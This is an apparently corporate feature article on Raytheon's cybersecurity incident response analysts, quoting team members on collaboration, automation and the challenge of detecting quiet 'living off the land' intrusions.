Collaboration and automation in a matrix of malware
“Every day presents a new challenge,” said Jack, a cybersecurity analyst technical lead. “Sometimes we’re handed a hard drive with minimal information, other times we’re in environments with tens of thousands of systems to analyze.”
Jack explains how crucial collaborating is, emphasizing how team dynamics help ensure nothing is overlooked.
“My colleagues will be sitting there looking at the same data set, and they’re going to find something I may have missed. It’s knowing each other’s strong points and playing off each other,” Jack said.
Raytheon is investing in automation to discover and analyze incidents faster, eliminate human error and produce actionable intelligence faster.
Automating rote tasks frees up the team to use their critical-thinking skills and work more closely with customers, tailoring their approach based on the specifics of an incident and the complexity of the network.
“If industrial control systems are involved, we bring in our specialists in that domain,” said James, a cyber incident response manager. “Likewise, if it’s a cloud infrastructure issue, our cloud experts step in.”
Looking for a needle in a stack of needles
Regina is a cybersecurity analyst lead, overseeing more than 30 team members. Her analysts comb through data to look for evidence of cyberattacks, uncovering anomalies and finding any intrusions.
“It’s like searching for a needle in a stack of needles,” Regina said.
Some of the hardest intrusions to detect are those designed to happen quietly and invisibly. A tactic employed by attackers called “living off the land,” uses tools native to the environment, so as not to create an anomaly and thus avoid detection.
“It blurs the line between legitimate activity and potential threats,” said Joseph, a cybersecurity analyst.
Regina and many of her colleagues have a saying: Bad actors only need to win once. We have to win every time.
“The bad guys often have the upper hand because they operate without any rules, while we, as the defenders, must operate within strict boundaries,” she said.
Each day presents a different challenge for Regina and her team, from misconfigured servers and insecure edge devices to potential breaches that require swift action. However, it is not just about reacting to problems as they arise; it is also about proactively hunting down vulnerabilities and strengthening security measures.